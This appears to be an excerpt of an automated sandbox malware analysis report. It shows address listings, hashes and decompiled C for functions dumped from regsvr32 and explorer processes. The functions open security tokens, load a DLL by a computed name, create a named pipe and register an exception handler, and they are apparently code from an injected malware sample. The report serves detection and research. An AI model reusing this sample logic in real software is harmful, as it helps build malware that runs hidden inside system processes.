                                                                                                                                                                        0x05ba4404
                                                                                                                                                                        0x05ba440d
                                                                                                                                                                        0x05ba4414
                                                                                                                                                                        0x05ba4416
                                                                                                                                                                        0x05ba4419
                                                                                                                                                                        0x05ba4419
                                                                                                                                                                        0x05ba441c
                                                                                                                                                                        0x05ba441c
                                                                                                                                                                        0x05ba441f
                                                                                                                                                                        0x05ba4421
                                                                                                                                                                        0x05ba4424
                                                                                                                                                                        0x05ba4426
                                                                                                                                                                        0x05ba4441
                                                                                                                                                                        0x05ba4441
                                                                                                                                                                        0x05ba4445
                                                                                                                                                                        0x05ba4448
                                                                                                                                                                        0x05ba444b
                                                                                                                                                                        0x05ba444e
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4450
                                                                                                                                                                        0x05ba4450
                                                                                                                                                                        0x05ba4452
                                                                                                                                                                        0x05ba4456
                                                                                                                                                                        0x05ba4459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba445b
                                                                                                                                                                        0x05ba445b
                                                                                                                                                                        0x05ba445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445d
                                                                                                                                                                        0x05ba4459
                                                                                                                                                                        0x05ba4468
                                                                                                                                                                        0x05ba446b
                                                                                                                                                                        0x05ba4470
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447d
                                                                                                                                                                        0x05ba4428
                                                                                                                                                                        0x05ba4428
                                                                                                                                                                        0x05ba442a
                                                                                                                                                                        0x05ba4431
                                                                                                                                                                        0x05ba4431
                                                                                                                                                                        0x05ba4433
                                                                                                                                                                        0x05ba4435
                                                                                                                                                                        0x05ba4437
                                                                                                                                                                        0x05ba443b
                                                                                                                                                                        0x05ba443d
                                                                                                                                                                        0x05ba443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba443f
                                                                                                                                                                        0x05ba443b
                                                                                                                                                                        0x05ba442c
                                                                                                                                                                        0x05ba442c
                                                                                                                                                                        0x05ba442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba442f
                                                                                                                                                                        0x05ba442a
                                                                                                                                                                        0x05ba4487
                                                                                                                                                                        0x05ba4489
                                                                                                                                                                        0x05ba4489
                                                                                                                                                                        0x05ba4494
                                                                                                                                                                        0x05ba4337
                                                                                                                                                                        0x05ba4337
                                                                                                                                                                        0x05ba433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba433c
                                                                                                                                                                        0x05ba433c
                                                                                                                                                                        0x05ba433e
                                                                                                                                                                        0x05ba4342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4347
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba434b
                                                                                                                                                                        0x05ba4354
                                                                                                                                                                        0x05ba4354
                                                                                                                                                                        0x05ba4347
                                                                                                                                                                        0x05ba4342
                                                                                                                                                                        0x05ba433a
                                                                                                                                                                        0x05ba4326
                                                                                                                                                                        0x05ba432f
                                                                                                                                                                        0x05ba432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: ebd68d5ff4e8f36a82071ff9ffe6f0aa06a94833e798a303f9c47698d3eaa964
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: FED105726087009FCB24CF6DD8C496AB7E6FF88304B2489ADE88AC7741E771F9458B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9C79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9C79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x5baf818; // 0x5d5f8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                        0x05b9c7bd
                                                                                                                                                                        0x05b9c7ef
                                                                                                                                                                        0x05b9c7ef
                                                                                                                                                                        0x05b9c7bf
                                                                                                                                                                        0x05b9c7ca
                                                                                                                                                                        0x05b9c7eb
                                                                                                                                                                        0x05b9c7eb
                                                                                                                                                                        0x05b9c7cc
                                                                                                                                                                        0x05b9c7d6
                                                                                                                                                                        0x05b9c7e9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c7e9
                                                                                                                                                                        0x05b9c7ca
                                                                                                                                                                        0x05b9c7f4

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 05B9C7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: 9ed957ccfedeb4602749d165b756138ebb59fad51879ab7c5bebefd514dec191
                                                                                                                                                                        • Instruction ID: 0e3e9d7057a9a32b72879dfabd7a46fe2a7502f71929739b2b33f0808829af8f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ed957ccfedeb4602749d165b756138ebb59fad51879ab7c5bebefd514dec191
                                                                                                                                                                        • Instruction Fuzzy Hash: CBF03A7A610205EBDF109BA4D84AFBA7FECFB08240F0004A0F602D7050EB64FA408BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9D218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E05B9D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x5baf81c; // 0x5d5fbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E05B99DF2(_t50, 0x392);
					_t66 =  *0x5baf81c; // 0x5d5fbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E05B99E51( &_v140, 0x40, L"%08x", E05B9E2C5(_t66 + 0xb0, E05B9A43D(_t66 + 0xb0), 0));
					_t20 =  *0x5baf81c; // 0x5d5fbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E05B99DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x5baf81c; // 0x5d5fbe8
					_t68 = E05B99A5A(_t26 + 0x1020);
					_v12 = _t68;
					E05B98BAF( &_v8);
					_t32 =  *0x5baf81c; // 0x5d5fbe8
					_t34 = E05B99A5A(_t32 + 0x122a);
					 *0x5baf91c = _t34;
					_t35 =  *0x5baf818; // 0x5d5f8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x5bac9a0,  &_v140, ".", L"dll", 0, 0x5bac9a0, _t25, 0x5bac9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x5baf91c);
					 *0x5baf914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E05B9F011(0x5bacb8c, _t60);
					}
					 *0x5baf918 = _t38;
					E05B98BF4( &_v12, 0xfffffffe);
					E05B98D6D( &_v140, 0, 0x80);
					if( *0x5baf918 != 0) {
						goto L10;
					} else {
						E05B98BF4(0x5baf91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x5baf918 == 0) {
						_t46 =  *0x5baf850; // 0x5d5f9f0
						 *0x5baf918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                        0x05b9d218
                                                                                                                                                                        0x05b9d218
                                                                                                                                                                        0x05b9d218
                                                                                                                                                                        0x05b9d21b
                                                                                                                                                                        0x05b9d227
                                                                                                                                                                        0x05b9d227
                                                                                                                                                                        0x05b9d232
                                                                                                                                                                        0x05b9d24e
                                                                                                                                                                        0x05b9d253
                                                                                                                                                                        0x05b9d25c
                                                                                                                                                                        0x05b9d25e
                                                                                                                                                                        0x05b9d266
                                                                                                                                                                        0x05b9d287
                                                                                                                                                                        0x05b9d28c
                                                                                                                                                                        0x05b9d291
                                                                                                                                                                        0x05b9d299
                                                                                                                                                                        0x05b9d2a6
                                                                                                                                                                        0x05b9d2b4
                                                                                                                                                                        0x05b9d2c5
                                                                                                                                                                        0x05b9d2cb
                                                                                                                                                                        0x05b9d2ce
                                                                                                                                                                        0x05b9d2e5
                                                                                                                                                                        0x05b9d2f1
                                                                                                                                                                        0x05b9d2f9
                                                                                                                                                                        0x05b9d300
                                                                                                                                                                        0x05b9d306
                                                                                                                                                                        0x05b9d312
                                                                                                                                                                        0x05b9d318
                                                                                                                                                                        0x05b9d31f
                                                                                                                                                                        0x05b9d332
                                                                                                                                                                        0x05b9d321
                                                                                                                                                                        0x05b9d321
                                                                                                                                                                        0x05b9d324
                                                                                                                                                                        0x05b9d32a
                                                                                                                                                                        0x05b9d32f
                                                                                                                                                                        0x05b9d334
                                                                                                                                                                        0x05b9d33f
                                                                                                                                                                        0x05b9d351
                                                                                                                                                                        0x05b9d363
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d365
                                                                                                                                                                        0x05b9d36c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d372
                                                                                                                                                                        0x05b9d373
                                                                                                                                                                        0x05b9d373
                                                                                                                                                                        0x05b9d37a
                                                                                                                                                                        0x05b9d37c
                                                                                                                                                                        0x05b9d381
                                                                                                                                                                        0x05b9d381
                                                                                                                                                                        0x05b9d386
                                                                                                                                                                        0x05b9d38a
                                                                                                                                                                        0x05b9d38a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 334497af9761c5364c7109a5ce7639a545bc364b9d91bd7ef9be0c0045544ca0
                                                                                                                                                                        • Instruction ID: 6cf9af1a3b1e6c931370eb52381fd26663719d254de1f2de0095e806c9a3a066
                                                                                                                                                                        • Opcode Fuzzy Hash: 334497af9761c5364c7109a5ce7639a545bc364b9d91bd7ef9be0c0045544ca0
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C317FB6654104AFDB54AA68EC4BFFA7AACEB45310F5481B6F004D3180EE34BA858769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA3674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05BA3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E05BA358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E05B9A43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x5bacf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x5bacf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L05BA8935();
				return _t29 - _t22;
			}

















                                                                                                                                                                        0x05ba3674
                                                                                                                                                                        0x05ba367f
                                                                                                                                                                        0x05ba3686
                                                                                                                                                                        0x05ba368d
                                                                                                                                                                        0x05ba3693
                                                                                                                                                                        0x05ba369b
                                                                                                                                                                        0x05ba369c
                                                                                                                                                                        0x05ba369e
                                                                                                                                                                        0x05ba36a3
                                                                                                                                                                        0x05ba36ab
                                                                                                                                                                        0x05ba36ab
                                                                                                                                                                        0x05ba36ae
                                                                                                                                                                        0x05ba36b2
                                                                                                                                                                        0x05ba36a5
                                                                                                                                                                        0x05ba36a5
                                                                                                                                                                        0x05ba36a9
                                                                                                                                                                        0x05ba36ab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba36ab
                                                                                                                                                                        0x05ba36a9
                                                                                                                                                                        0x05ba36bb
                                                                                                                                                                        0x05ba36c4
                                                                                                                                                                        0x05ba36c9
                                                                                                                                                                        0x05ba36cc
                                                                                                                                                                        0x05ba36cf
                                                                                                                                                                        0x05ba36d2
                                                                                                                                                                        0x05ba36d4
                                                                                                                                                                        0x05ba36d4
                                                                                                                                                                        0x05ba36da
                                                                                                                                                                        0x05ba36dd
                                                                                                                                                                        0x05ba36e0
                                                                                                                                                                        0x05ba36e3
                                                                                                                                                                        0x05ba36e8
                                                                                                                                                                        0x05ba36ea
                                                                                                                                                                        0x05ba36ea
                                                                                                                                                                        0x05ba36f0
                                                                                                                                                                        0x05ba36fc
                                                                                                                                                                        0x05ba36fe
                                                                                                                                                                        0x05ba370a

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 05BA36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 05BA36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: 90dc7053ac36ea0d034e79bef8cc99ba7f24a0ce1680454794f551dd86c9b2b2
                                                                                                                                                                        • Instruction ID: cd8900799d145c64e644e2b0f2fba75380089f97480f01df31a0404fabbc9ac6
                                                                                                                                                                        • Opcode Fuzzy Hash: 90dc7053ac36ea0d034e79bef8cc99ba7f24a0ce1680454794f551dd86c9b2b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 8911E033A08649ABCF00AF68E80A49D7FB5FF90350B2289A9E81193241EB31E5648781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 007A36AA Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                        			E007A36AA(void* __edx, void* __eflags) {
				CHAR* _v8;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				signed int _t13;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t39;
				CHAR* _t41;

				_t39 = __edx;
				_t28 =  *0x7bf81c; // 0x7d0000
				_t10 = E007AD11F( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t41 = _t10;
				_v8 = _t41;
				if(_t41 != 0) {
					_t11 = E007A8BDE(0x80000); // executed
					 *0x7bf8bc = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E007ACD02( &_v20);
						__eflags = _t12;
						if(_t12 >= 0) {
							_t13 = _v20;
						} else {
							_t13 = 0;
							_v20 = 0;
						}
						__eflags = 0 - _t13;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t41, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, _t13 &  &_v20);
						 *0x7bf804 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E007ACAE1( &_v20, _t39); // executed
							_t18 = E007AA205(E007A377F, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x7bf818; // 0xeaf6c8
							 *((intOrPtr*)(_t22 + 0x30))( *0x7bf804);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x7bf804 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E007A8BF4( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}















                                                                                                                                                                        0x007a36aa
                                                                                                                                                                        0x007a36b0
                                                                                                                                                                        0x007a36c0
                                                                                                                                                                        0x007a36c5
                                                                                                                                                                        0x007a36c7
                                                                                                                                                                        0x007a36cc
                                                                                                                                                                        0x007a36dd
                                                                                                                                                                        0x007a36e2
                                                                                                                                                                        0x007a36e8
                                                                                                                                                                        0x007a36ea
                                                                                                                                                                        0x007a36f3
                                                                                                                                                                        0x007a36f8
                                                                                                                                                                        0x007a36fa
                                                                                                                                                                        0x007a3703
                                                                                                                                                                        0x007a36fc
                                                                                                                                                                        0x007a36fc
                                                                                                                                                                        0x007a36fe
                                                                                                                                                                        0x007a36fe
                                                                                                                                                                        0x007a3708
                                                                                                                                                                        0x007a370d
                                                                                                                                                                        0x007a3727
                                                                                                                                                                        0x007a372d
                                                                                                                                                                        0x007a3732
                                                                                                                                                                        0x007a3735
                                                                                                                                                                        0x007a3741
                                                                                                                                                                        0x007a374f
                                                                                                                                                                        0x007a3756
                                                                                                                                                                        0x007a3758
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a375a
                                                                                                                                                                        0x007a3765
                                                                                                                                                                        0x007a3768
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3737
                                                                                                                                                                        0x007a3737
                                                                                                                                                                        0x007a373d
                                                                                                                                                                        0x007a376a
                                                                                                                                                                        0x007a376a
                                                                                                                                                                        0x007a376b
                                                                                                                                                                        0x007a3771
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a377a
                                                                                                                                                                        0x007a3735
                                                                                                                                                                        0x007a36ec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a36ec
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: adca72621185f3ffbb28bd4c09cd9a32fc8b0f55105c514150dbcd0f9ee39f18
                                                                                                                                                                        • Instruction ID: 73c215b6a22821d51644bba80c5f2ab2c4f13ceb410947705b2f8b53dfc404e2
                                                                                                                                                                        • Opcode Fuzzy Hash: adca72621185f3ffbb28bd4c09cd9a32fc8b0f55105c514150dbcd0f9ee39f18
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C2195B2604115ABD710AF79EC95FAA37E8EB86770B204339F526D71D1EB389A008790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5FF2 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A5FF2(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x7bf818; // 0xeaf6c8
				 *((intOrPtr*)(_t2 + 0x114))(1, E007A5F97);
				E007A5C22(_t6, _t7); // executed
				return 0;
			}






                                                                                                                                                                        0x007a5ff2
                                                                                                                                                                        0x007a5ffe
                                                                                                                                                                        0x007a6004
                                                                                                                                                                        0x007a600b

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,007A5F97,007A61C1), ref: 007A5FFE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionHandlerVectored
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3310709589-0
                                                                                                                                                                        • Opcode ID: 4b1ef988f7c4cebe009f21406cd7ab322aa6226ebba9ffced480de730153d2ae
                                                                                                                                                                        • Instruction ID: cd6a2d4ae02d5b52b12b89e26e5cb113c215e8101729abd7ba6fd4357b2829bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1ef988f7c4cebe009f21406cd7ab322aa6226ebba9ffced480de730153d2ae
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B09270241B009FC300A760EC0BFE836909B86B02F0046B0B208C50A6DAB844404A65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A50B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 7a50b3-7a50ec memset 1 7a5108-7a5111 call 7ac9f4 0->1 2 7a50ee-7a5104 0->2 6 7a512c-7a5186 call 7ac6ce call 7ac4c1 call 7a5072 call 7aa43d call 7ae2c5 call 7ac6e4 call 7a317e 1->6 7 7a5113-7a511e call 7a3097 1->7 2->1 28 7a5188-7a518b 6->28 29 7a5190-7a51af call 7a9a5a 6->29 11 7a5123-7a5126 7->11 11->6 12 7a53b5-7a53be call 7a5f6f 11->12 18 7a53c0-7a53c6 12->18 28->12 32 7a51d3-7a51d8 29->32 33 7a51b1-7a51b9 29->33 36 7a51da-7a520c call 7ad11f 32->36 37 7a523b-7a5250 call 7a98bd * 2 32->37 34 7a51bb-7a51c4 call 7af1b6 33->34 35 7a51c6-7a51c8 33->35 39 7a51ca-7a51ce call 7af1f6 34->39 35->32 35->39 49 7a520e-7a521e call 7a8bf4 36->49 50 7a5223-7a5239 call 7a8bf4 36->50 51 7a5255-7a5276 call 7aa633 37->51 39->32 49->18 50->51 51->12 57 7a527c-7a52aa call 7aaaa3 call 7aaadc call 7aaa7e 51->57 66 7a52ac-7a52ae call 7ab025 57->66 67 7a52b3-7a52b8 57->67 66->67 69 7a52ba-7a52bc call 7ab025 67->69 70 7a52c1-7a52cf call 7aa065 call 7aaa50 67->70 69->70 75 7a52d4-7a52db 70->75 76 7a52dd-7a52e9 75->76 77 7a5303-7a5310 75->77 78 7a52eb 76->78 79 7a532e-7a5335 76->79 80 7a531a-7a5327 call 7b0d7e 77->80 81 7a5312-7a5318 77->81 82 7a52f1-7a52f3 call 7a5ac0 78->82 84 7a533f-7a534f call 7a584b 79->84 85 7a5337-7a533a call 7af0de 79->85 91 7a52f8-7a52fa 80->91 81->82 82->91 92 7a5351-7a535d 84->92 93 7a53a6-7a53ab 84->93 85->84 94 7a5329 91->94 95 7a52fc 91->95 96 7a539e-7a53a0 lstrcpyW 92->96 97 7a535f-7a539c call 7a109a lstrcpyW call 7a8baf lstrcatW * 3 92->97 98 7a53ad-7a53b1 93->98 99 7a53b3 93->99 94->79 95->77 96->93 97->93 98->99 99->12
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E007A50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t70;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x7bf81c; // 0x7d0000
					_t110 =  *0x7bf820; // 0xeaf8b8
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))));
				}
				if(E007AC9F4(_t173) != 0) {
					L4:
					_t56 = E007AC6CE(); // executed
					_push(_t113);
					_v592 = _t56;
					E007AC4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E007A5072( &_v580,  &_v580, _t190);
					_t126 = E007AE2C5( &_v580, E007AA43D( &_v580), 0);
					E007AC6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E007A317E(_t173,  &_v580, _t190, _t192); // executed
